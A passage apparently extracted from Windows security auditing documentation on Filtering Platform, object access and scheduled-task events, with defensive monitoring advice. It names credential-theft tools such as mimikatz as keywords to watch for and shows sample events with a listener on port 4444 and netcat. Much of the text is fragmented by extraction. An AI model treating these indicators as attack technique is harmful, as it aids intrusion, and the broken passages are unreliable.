If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
5150(-): The Windows Filtering Platform blocked a
packet.
Applies to
Windows 10
Windows Server 2016
This event is logged if the Windows Filtering Platform MAC filter blocked a packet.
Subcategory: Audit Filtering Platform Connection
Event Schema:
The Windows Filtering Platform has blocked a packet.
Direction:%1
Source Address:%2
Destination Address:%3
EtherType:%4
MediaType:%5
InterfaceType:%6
VlanTag:%7
Filter Information:
Filter Run-Time ID:%8

Layer Name:%9
*Layer Run-Time ID:%10 *

Event Versions: 0.

5151(-): A more restrictive Windows Filtering Platform
filter has blocked a packet.
Applies to
Windows 10
Windows Server 2016
This event is logged if a more restrictive Windows Filtering Platform MAC filter has blocked a packet.
Event Schema:
A more restrictive Windows Filtering Platform filter has blocked a packet.
Direction:%1
Source Address:%2
Destination Address:%3
EtherType:%4
MediaType:%5
InterfaceType:%6
VlanTag:%7
Filter Information:

Layer Name:%9
*Layer Run-Time ID:%10 *

Event Versions: 0.

5154(S): The Windows Filtering Platform has
permitted an application or service to listen on a port
for incoming connections.
Applies to
Windows 10
Windows Server 2016
Connection
Event Description:
Windows Filtering Platform permits an
application or service to listen on a port.

for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ProcessId">4152</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="SourceAddress">0.0.0.0</Data>
<Data Name="SourcePort">4444</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">0</Data>
<Data Name="LayerName">%%14609</Data>
<Data Name="LayerRTID">40</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to listen on the
port. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:
Source Address [Type = UnicodeString]: local IP address on which application requested to listen on the
port.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: source TCP\UDP port number which was requested for listening by
application.
Protocol [Type = UInt32]: protocol number. For example:
6 – TCP.
17 – UDP.
More information about possible values for this field:
https://technet.microsoft.com/library/cc959827.aspx.
Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which allows application to listen on the specific port.
By default Windows firewall won't prevent a port from being listened by an application and if this
application doesn’t match any filters you will get value 0 in this field.
To find specific Windows Filtering Platform filter by ID you need to execute the following command: netsh
wfp show filters. As result of this command filters.xml file will be generated. You need to open this file
and find specific substring with required filter ID (<filterId>), for example:
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find specific Windows
Filtering Platform layer ID you need to execute the following command: netsh wfp show state. As result of
this command wfpstate.xml file will be generated. You need to open this file and find specific substring
with required layer ID (<layerId>), for example:
For 5154(S ): The Windows Filtering Platform has permitted an application or service to listen on a port for
If you have a “whitelist” of applications that are associated with certain operating systems or server roles,
and that are expected to listen on specific ports, monitor this event for “Application Name” and other
relevant information.
If a certain application is allowed to listen only on specific port numbers, monitor this event for
“Application Name” and “Network Information\Source Port.”
If a certain application is allowed to listen only on a specific IP address, monitor this event for “Application
Name” and “Network Information\Source Address.”
If a certain application is allowed to use only TCP or UDP protocols, monitor this event for “Application
Name” and the protocol number in “Network Information\Protocol.”
Typically this event has an informational purpose.
5155(F): The Windows Filtering Platform has blocked
an application or service from listening on a port for
Applies to
Windows 10
Windows Server 2016
By default Windows firewall won't prevent a port from being listened by an application. In the other word,
Windows system will not generate Event 5155 by itself.
You can add your own filters using the WFP APIs to block listen to reproduce this event:
https://msdn.microsoft.com/library/aa364046(v=vs.85).aspx.
There is no event example in this document.
Event Schema:
The Windows Filtering Platform has blocked an application or service from listening on a port for incoming
connections.
Process ID:%1
Application Name:%2
Source Address:%3
Source Port:%4
Protocol:%5
Filter Information:

Layer Name:%7
Layer Run-Time ID:%8

Event Versions: 0.
If you use Windows Filtering Platform APIs to block application or services from listening on a port, then you
can use this event for troubleshooting and monitoring.
permitted a connection.
Applies to
Windows 10
Windows Server 2016
Connection
Event Description:
This event generates when Windows
Filtering Platform has allowed a
connection.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ProcessID">4556</Data>
<Data Name="Direction">%%14592</Data>
<Data Name="DestAddress">10.0.0.100</Data>
<Data Name="DestPort">49278</Data>
<Data Name="RemoteUserID">S-1-0-0</Data>
<Data Name="RemoteMachineID">S-1-0-0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which received the connection. Process
ID (PID ) is a number used by the operating system to uniquely identify an active process. To see the PID for
a specific process you can, for example, use Task Manager (Details tab, PID column):
Direction [Type = UnicodeString]: direction of allowed connection.
Inbound – for inbound connections.
Outbound – for unbound connections.
Source Address [Type = UnicodeString]: local IP address on which application received the connection.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the connection.
Destination Address [Type = UnicodeString]: IP address from which connection was received or initiated.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to initiate
connection.
Protocol [Type = UInt32]: number of protocol which was used.
SERVICE PROTOCOL NUMBER
Internet Control Message Protocol (ICMP) 1
Transmission Control Protocol (TCP) 6
User Datagram Protocol (UDP) 17
General Routing Encapsulation (PPTP data over GRE) 47
Authentication Header (AH) IPSec 51
Encapsulation Security Payload (ESP) IPSec 50
Exterior Gateway Protocol (EGP) 8
Gateway-Gateway Protocol (GGP) 3
Host Monitoring Protocol (HMP) 20
Internet Group Management Protocol (IGMP) 88
MIT Remote Virtual Disk (RVD) 66
OSPF Open Shortest Path First 89
PARC Universal Packet Protocol (PUP) 12
Reliable Datagram Protocol (RDP) 27
Reservation Protocol (RSVP) QoS 46
Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which allowed the connection.
For 5156(S ): The Windows Filtering Platform has permitted a connection.
Check that “Source Address” is one of the addresses assigned to the computer.
If the computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5156 events where “Destination Address” is an IP address from the
Internet (not from private IP ranges).
If you know that the computer should never contact or be contacted by certain network IP addresses,
monitor for these addresses in “Destination Address.”
If you have a “whitelist” of IP addresses that the computer or device is expected to contact or be contacted
by, monitor for IP addresses in “Destination Address” that are not in the whitelist.
If you need to monitor all inbound connections to a specific local port, monitor for 5156 events with that
“Source Port.”
Monitor for all connections with a “Protocol Number” that is not typical for this device or compter, for
example, anything other than 1, 6, or 17.
If the computer’s communication with “Destination Address” should always use a specific “Destination
Port,” monitor for any other “Destination Port.”
a connection.
Applies to
Windows 10
Windows Server 2016
Connection
Event Description:
Filtering Platform has blocked a
connection.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ProcessID">4556</Data>
<Data Name="RemoteUserID">S-1-0-0</Data>
<Data Name="RemoteMachineID">S-1-0-0</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to create the
connection. Process ID (PID ) is a number used by the operating system to uniquely identify an active
column):
Direction [Type = UnicodeString]: direction of blocked connection.
Source Address [Type = UnicodeString]: local IP address on which application received the connection.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the connection.
Destination Address [Type = UnicodeString]: IP address from which connection was received or initiated.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to initiate
connection.
Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which blocked the connection.
Filtering Platform layer ID you need to execute the following command: netsh wfp show state. As result
of this command wfpstate.xml file will be generated. You need to open this file and find specific substring
For 5157(F ): The Windows Filtering Platform has blocked a connection.
If the` computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5157 events where “Destination Address” is an IP address from the
“Source Port.”
permitted a bind to a local port.
Applies to
Windows 10
Windows Server 2016
Connection
Event Description:
Windows Filtering Platform permits an
application or service to bind to a local
port.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to bind to the
local port. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
Source Address [Type = UnicodeString]: local IP address on which application was bind the port.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number which application was bind.

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which allows application to bind the port. By default
Windows firewall won't prevent a port from being binded by an application and if this application doesn’t
match any filters you will get value 0 in this field.

For 5158(S ): The Windows Filtering Platform has permitted a bind to a local port.
If you need to monitor all actions with a specific local port, monitor for 5158 events with that “Source
Port.”
example, anything other than 6 or 17.
a bind to a local port.
Applies to
Windows 10
Windows Server 2016
Connection
Event Description:
This event is logged if the Windows
Filtering Platform has blocked a bind to a
local port.
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="Application">\device\harddiskvolume2\users\test\desktop\netcat\nc.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to bind to the
local port. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
Source Address [Type = UnicodeString]: the local IP address of the computer running the application.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: the port number used by the application.
Protocol [Type = UInt32]: the protocol number being used.

Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which blocks the application from binding to the port.
By default, Windows firewall won't prevent a port from binding by an application, and if this application
doesn’t match any filters, you will get value 0 in this field.
wfp show filters. As a result of this command, filters.xml file will be generated. You need to open this file
and find the specific substring with the required filter ID (<filterId>), for example:

Applies to
Windows 10
Windows Server 2016
Audit Filtering Platform Packet Drop determines whether the operating system generates audit events when
packets are dropped by the Windows Filtering Platform.
Windows Filtering Platform (WFP ) enables independent software vendors (ISVs) to filter and modify TCP/IP
packets, monitor or authorize connections, filter Internet Protocol security (IPsec)-protected traffic, and filter
remote procedure calls (RPCs).
A high rate of dropped packets may indicate that there have been attempts to gain unauthorized access to
computers on your network.
Event volume: High.
STRONGER STRONGER
Domain No No No No Failure events

Controller volume typically
is very high for
this subcategory
and typically used
for
troubleshooting.
If you need to
monitor blocked
connections, it is
better to use
“5157(F): The
Windows Filtering
Platform has
blocked a
connection,”
because it
contains almost
the same
information and
generates per-
connection, not
per-packet.
There is no
recommendation
to enable Success
auditing, because
Success events in
this subcategory
rarely occur.
STRONGER STRONGER
Member Server No No No No Failure events

volume typically
is very high for
this subcategory
and typically used
for
troubleshooting.
If you need to
monitor blocked
connections, it is
better to use
“5157(F): The
Windows Filtering
Platform has
blocked a
connection,”
because it
contains almost
the same
information and
generates per-
connection, not
per-packet.
There is no
recommendation
to enable Success
auditing, because
Success events in
this subcategory
rarely occur.
STRONGER STRONGER
Workstation No No No No Failure events

volume typically
is very high for
this subcategory
and typically used
for
troubleshooting.
If you need to
monitor blocked
connections, it is
better to use
“5157(F): The
Windows Filtering
Platform has
blocked a
connection,”
because it
contains almost
the same
information and
generates per-
connection, not
per-packet.
There is no
recommendation
to enable Success
auditing, because
Success events in
this subcategory
rarely occur.
Events List:
5152(F ): The Windows Filtering Platform blocked a packet.
5153(S ): A more restrictive Windows Filtering Platform filter has blocked a packet.
5152(F): The Windows Filtering Platform blocked a
packet.
Applies to
Windows 10
Windows Server 2016
Packet Drop
Event Description:
Filtering Platform has blocked a
network packet.
This event is generated for every
received network packet.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12809</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Process ID [Type = Pointer]: hexadecimal Process ID of the process to which blocked network packet was
sent. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To
Direction [Type = UnicodeString]: direction of blocked connection.
Source Address [Type = UnicodeString]: local IP address on which application received the packet.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: port number on which application received the packet.
Destination Address [Type = UnicodeString]: IP address from which packet was received or initiated.
IPv4 Address
IPv6 Address
127.0.0.1 , ::1 - localhost
Destination Port [Type = UnicodeString]: port number which was used from remote machine to send the
packet.
Filter Information:
Filter Run-Time ID [Type = UInt64]: unique filter ID which blocked the packet.
For 5152(F ): The Windows Filtering Platform blocked a packet.
Check that Source Address is one of the addresses assigned to the computer.
If the computer or device should not have access to the Internet, or contains only applications that don’t
connect to the Internet, monitor for 5152 events where Destination Address is an IP address from the
“Source Port.”
5153(S): A more restrictive Windows Filtering Platform
filter has blocked a packet.
Applies to
Windows 10
Windows Server 2016
This event is logged if a more restrictive Windows Filtering Platform filter has blocked a packet.
Subcategory: Audit Filtering Platform Packet Drop
Event Schema:
A more restrictive Windows Filtering Platform filter has blocked a packet.
Process ID:%1
Application Name:%2
Source Address:%3
Source Port:%4
Protocol:%5
Filter Information:

Layer Name:%7
Layer Run-Time ID:%8

Event Versions: 0.

Applies to
Windows 10
Windows Server 2016
Audit Handle Manipulation enables generation of “4658: The handle to an object was closed” in Audit File
System, Audit Kernel Object, Audit Registry, Audit Removable Storage and Audit SAM subcategories, and shows
object’s handle duplication and close actions.
Event volume: High.
STRONGER STRONGER
Domain No No No No Typically,
Controller information
about the
duplication or
closing of an
object handle
has little to no
security
relevance and is
hard to parse or
analyze.
There is no
recommendation
to enable this
subcategory for
Success or
Failure auditing,
unless you know
exactly what you
need to monitor
in Object’s
Handles level.
STRONGER STRONGER
Member Server No No No No Typically,

information
about the
duplication or
closing of an
object handle
has little to no
security
relevance and is
hard to parse or
analyze.
There is no
recommendation
to enable this
subcategory for
Success or
Failure auditing,
unless you know
exactly what you
need to monitor
in Object’s
Handles level.
Workstation No No No No Typically,
information
about the
duplication or
closing of an
object handle
has little to no
security
relevance and is
hard to parse or
analyze.
There is no
recommendation
to enable this
subcategory for
Success or
Failure auditing,
unless you know
exactly what you
need to monitor
in Object’s
Handles level.
Events List:
4690(S ): An attempt was made to duplicate a handle to an object.

This event doesn’t generate in this subcategory, but you can use this subcategory to enable it. For a description
of the event, see “4658(S ): The handle to an object was closed” in the Audit File System subcategory.
4690(S): An attempt was made to duplicate a handle
to an object.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Handle Manipulation
Event Description:
This event generates if an attempt was made to
duplicate a handle to an object.

Event XML:
- <System>
<Level>0</Level>
<Task>12807</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SourceHandleId">0x438</Data>
<Data Name="SourceProcessId">0x674</Data>
<Data Name="TargetHandleId">0xd9c</Data>
<Data Name="TargetProcessId">0x4</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to duplicate a handle to an object. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made an attempt to duplicate a
handle to an object.
the following:
Source Handle Information:
Source Handle ID [Type = Pointer]: hexadecimal value of a handle which was duplicated. This field can
help you correlate this event with other events, for example “4663: An attempt was made to access an
object” in Audit File System, Audit Kernel Object, Audit Registry, Audit Removable Storage or Audit SAM
subcategories.
Source Process ID [Type = Pointer]: hexadecimal Process ID of the process which opened the Source
Handle ID before it was duplicated. Process ID (PID ) is a number used by the operating system to uniquely
identify an active process. To see the PID for a specific process you can, for example, use Task Manager
(Details tab, PID column):
New Handle Information:
Target Handle ID [Type = Pointer]: hexadecimal value of the new handle (the copy of Source Handle ID ).
This field can help you correlate this event with other events, for example “4663: An attempt was made to
access an object” in Audit File System, Audit Kernel Object, Audit Registry, Audit Removable Storage or
Audit SAM subcategories.
Target Process ID [Type = Pointer]: hexadecimal Process ID of the process which opened the Target
Handle ID. Process ID (PID ) is a number used by the operating system to uniquely identify an active
process. You can also correlate this process ID with a process ID in other events, for example, “4688: A new
process has been created” Process Information\New Process ID field.
For 4690(S ): An attempt was made to duplicate a handle to an object.
Audit Kernel Object
Applies to
Windows 10
Windows Server 2016
Audit Kernel Object determines whether the operating system generates audit events when users attempt to
access the system kernel, which includes mutexes and semaphores.
Only kernel objects with a matching system access control list (SACL ) generate security audit events. The audits
generated are usually useful only to developers.
Typically, kernel objects are given SACLs only if the AuditBaseObjects or AuditBaseDirectories auditing options
are enabled.
The “Audit: Audit the access of global system objects” policy setting controls the default SACL of kernel objects.
Event volume: High.

Domain No No No No Typically Kernel

Controller object auditing
events have little
to no security
relevance and
are hard to parse
or analyze. Also,
the volume of
these events is
typically very
high.
There is no
recommendation
to enable this
subcategory,
unless you know
exactly what you
need to monitor
at the Kernel
objects level.
Member Server No No No No Typically Kernel

object auditing
events have little
to no security
relevance and
are hard to parse
or analyze. Also,
the volume of
these events is
typically very
high.
There is no
recommendation
to enable this
subcategory,
unless you know
exactly what you
need to monitor
at the Kernel
objects level.
Workstation No No No No Typically Kernel

object auditing
events have little
to no security
relevance and
are hard to parse
or analyze. Also,
the volume of
these events is
typically very
high.
There is no
recommendation
to enable this
subcategory,
unless you know
exactly what you
need to monitor
at the Kernel
objects level.
Events List:
Applies to
Windows 10
Windows Server 2016
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel, or
registry object, or a file system object on removable storage or a device.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the operation
was performed. To see that the operation was performed, check “4663(S ): An attempt was made to access an
object.”
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:
(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
event.
the following:
Object:

0000-000000000000}”.
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID. These
HEXADECIMAL VALUE,
directory.
HEXADECIMAL VALUE,


sub-keys.”)

%%4420 attributes.

interpreter.
are assigned the


%%4423

%%4424

%%1537


HEXADECIMAL VALUE,


this access right.

Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used during
the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that
case appears as “-”. See full list of user privileges in the table below:

a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE




APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

processes.

network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
clock.



a terminal device.
Object Types.

If Object Name is a sensitive or critical object for which you need to monitor any access attempt, monitor
all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts (for
example, only write actions), monitor for all 4656 events with the corresponding Access Request
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656 events
with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request Information\Accesses
rights (especially for Failure events):
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Applies to
Windows 10
Windows Server 2016
Event Description:
device.
enabled for Audit Handle Manipulation
subcategory.
open. Otherwise, it might not have any security
relevance.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s handle”
operation.
the following:
Object:
closed. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel
Object, and Audit Registry
Event Description:
This event generates only if “Delete" auditing is
set in object’s SACL.
deleted object (only the Handle ID ). It is better
to use “4663(S ): An attempt was made to
access an object” with DELETE access to track
object deletion.
generated only during real delete operations. In
contrast, “4663(S ): An attempt was made to
access an object” also generates during other
actions, such as object renaming.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
operation.
the following:
Object:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID (PID )
is a number used by the operating system to uniquely identify an active process. To see the PID for a specific
with other events that might contain the same Transaction ID, such as “4656(S, F ): A handle to an object
was requested.”
0000-000000000000}”.
4663(S): An attempt was made to access an object.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System,
Audit Kernel Object, Audit Registry,
and Audit Removable Storage
Event Description:
This event indicates that a specific
operation was performed on an
object. The object could be a file
system, kernel, or registry object, or
a file system object on removable
storage or a device.
This event generates only if object’s
SACL has required ACE to handle
specific access right use.
The main difference with “4656: A
handle to an object was requested.”
event is that 4663 shows that
access right was used instead of
just requested and 4663 doesn’t
have Failure events.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to access an object. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an object.
the following:
Object:
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used for
correlation with other events, for example with Handle ID field in “4656(S, F ): A handle to an object was
requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process ID
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID. These
HEX VALUE,
directory.


sub-keys.”)

%%4420 attributes.

interpreter.
are assigned the

HEX VALUE,

%%4423

%%4424

%%1537




this access right.


If you have critical file system objects for which you need to monitor all access attempts, monitor this event
for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for example,
write actions), monitor this event for Object Name in relation to Access Request Information\Accesses.
If Object Name is a sensitive or critical registry key for which you need to monitor specific access attempts
For file system objects, we recommend that you monitor for these Access Request Information\Accesses
rights:
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Applies to
Windows 10
Windows Server 2016
Audit Other Object Access Events allows you to monitor operations with scheduled tasks, COM+ objects and
indirect object access requests.
Event volume: Low.
STRONGER STRONGER

first of all
because of
scheduled tasks
events.
We recommend
Failure auditing
to get events
about possible
ICMP DoS
attack.

Success auditing
first of all
because of
scheduled tasks
events.
We recommend
Failure auditing
to get events
about possible
ICMP DoS
attack.

Success auditing
first of all
because of
scheduled tasks
events.
We recommend
Failure auditing
to get events
about possible
ICMP DoS
attack.
Events List:
4671(-): An application attempted to access a blocked ordinal through the TBS.
4691(S ): Indirect access to an object was requested.
5148(F ): The Windows Filtering Platform has detected a DoS attack and entered a defensive mode;
packets associated with this attack will be discarded.
5149(F ): The DoS attack has subsided and normal processing is being resumed.
4698(S ): A scheduled task was created.
4699(S ): A scheduled task was deleted.
4700(S ): A scheduled task was enabled.
4701(S ): A scheduled task was disabled.
4702(S ): A scheduled task was updated.
5888(S ): An object in the COM+ Catalog was modified.
5889(S ): An object was deleted from the COM+ Catalog.
5890(S ): An object was added to the COM+ Catalog.
4671(-): An application attempted to access a blocked
ordinal through the TBS.
Applies to
Windows 10
Windows Server 2016
Currently this event doesn’t generate. It is a defined event, but it is never invoked by the operating system.
Subcategory: Audit Other Object Access Events
4691(S): Indirect access to an object was requested.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access
Events
Event Description:
This event indicates that indirect access to
an object was requested.
These events are generated for ALPC
Ports access request actions.

for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectType">ALPC Port</Data>
<Data Name="ObjectName">\\Sessions\\2\\Windows\\DwmApiPort</Data>
<Data Name="ProcessId">0xe60</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested an access to the object. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that requested an access to the object.
the following:
Object:
Object Type [Type = UnicodeString]: The type of an object for which access was requested.
Object Name [Type = UnicodeString]: full path and name of the object for which access was requested.
These access rights depend on Object Type. “Table 13. File access codes.” contains information about the
most common access rights for file system objects. For information about ALPC ports access rights, use
https://technet.microsoft.com/ or other informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed. See
“Table 13. File access codes.” for more information about file access rights. For information about ALPC
ports access rights, use https://technet.microsoft.com/ or other informational resources.

For 4691(S ): Indirect access to an object was requested.
recommendation for this event, unless you know exactly what you need to monitor with ALPC Ports.
5148(F): The Windows Filtering Platform has detected
a DoS attack and entered a defensive mode; packets
associated with this attack will be discarded.
Applies to
Windows 10
Windows Server 2016
In most circumstances, this event occurs very rarely. It is designed to be generated when an ICMP DoS attack
starts or was detected.
Event Schema:
The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with
this attack will be discarded.
Type:%1

Event Versions: 0.

This event can be a sign of ICMP DoS attack or, among other things, hardware or network device related
problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
5149(F): The DoS attack has subsided and normal
processing is being resumed.
Applies to
Windows 10
Windows Server 2016
In most circumstances, this event occurs very rarely. It is designed to be generated when an ICMP DoS attack
ended.
Event Schema:
The DoS attack has subsided and normal processing is being resumed.
Type:%1
Packets Discarded:%2

Event Versions: 0.

This event can be a sign of ICMP DoS attack or, among other things, hardware or network device related
problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
4698(S): A scheduled task was created.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a new scheduled task is
created.
Note For recommendations, see Security Monitoring

Event XML:
- <System>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\StartListener</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-
22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create scheduled task” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create scheduled task”
operation.
the following:
Task Information:
Task Name [Type = UnicodeString]: new scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:
Task Content [Type = UnicodeString]: the XML content of the new task. For more information about the XML
format for scheduled tasks, see “XML Task Definition Format.”

For 4698(S ): A scheduled task was created.
We recommend monitoring all scheduled task creation events, especially on critical computers or devices.
Scheduled tasks are often used by malware to stay in the system after reboot or for other malicious actions.
Monitor for new tasks located in the Task Scheduler Library root node, that is, where Task Name looks
like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located in the Task
Scheduler Library root node.
In the new task, if the Task Content: XML contains <LogonType>Password</LogonType> value, trigger
an alert. In this case, the password for the account that will be used to run the scheduled task will be saved in
